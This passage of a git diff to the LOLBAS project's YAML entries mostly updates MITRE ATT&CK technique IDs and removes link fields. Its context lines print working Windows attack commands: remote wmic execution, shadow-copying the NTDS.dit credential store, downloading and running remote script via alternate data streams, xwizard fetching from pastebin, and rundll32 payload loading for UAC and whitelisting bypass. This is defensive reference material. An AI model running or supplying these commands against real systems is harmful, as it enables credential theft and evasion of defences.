|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | ||||
|     Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. | ||||
| @@ -42,7 +38,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
| @@ -50,7 +45,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
| @@ -58,7 +52,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | ||||
|     Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. | ||||
| @@ -66,7 +59,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wbem\wmic.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\WorkFolders.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute hidden code to evade defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js | ||||
|     Description: Download and execute script stored in an alternate data stream | ||||
|     Usecase: Execute hidden code to evade defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wscript.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1088 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1088 | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wsreset.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute dll via attach/detach methods | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wuauclt.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} | ||||
|     Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM | ||||
|     Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\xwizard.exe | ||||
|   | ||||
| @@ -9,39 +9,36 @@ Commands: | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, | ||||
|     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe advpack.dll,RegisterOCX test.dll | ||||
|     Description: Launch a DLL payload by calling the RegisterOCX function. | ||||
|     Usecase: Load a DLL payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe | ||||
|     Description: Launch an executable by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | ||||
|     Description: Launch command line by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\advpack.dll | ||||
|   - Path: c:\windows\syswow64\advpack.dll | ||||
|   | ||||
| @@ -9,39 +9,34 @@ Commands: | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, | ||||
|     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). | ||||
|     Usecase: Run local or remote script(let) code through INF file specification. | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll | ||||
|     Description: Launch a DLL payload by calling the RegisterOCX function. | ||||
|     Usecase: Load a DLL payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe | ||||
|     Description: Launch an executable by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|   - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" | ||||
|     Description: Launch command line by calling the RegisterOCX function. | ||||
|     Usecase: Run an executable payload. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\ieadvpack.dll | ||||
|   - Path: c:\windows\syswow64\ieadvpack.dll | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     UseCase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MItreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\ieframe.dll | ||||
| @@ -29,4 +28,4 @@ Acknowledgement: | ||||
|     Handle: '@bohops' | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
| --- | ||||
|   | ||||
Some files were not shown because too many files have changed in this diff Show More
		Reference in New Issue
	
	Block a user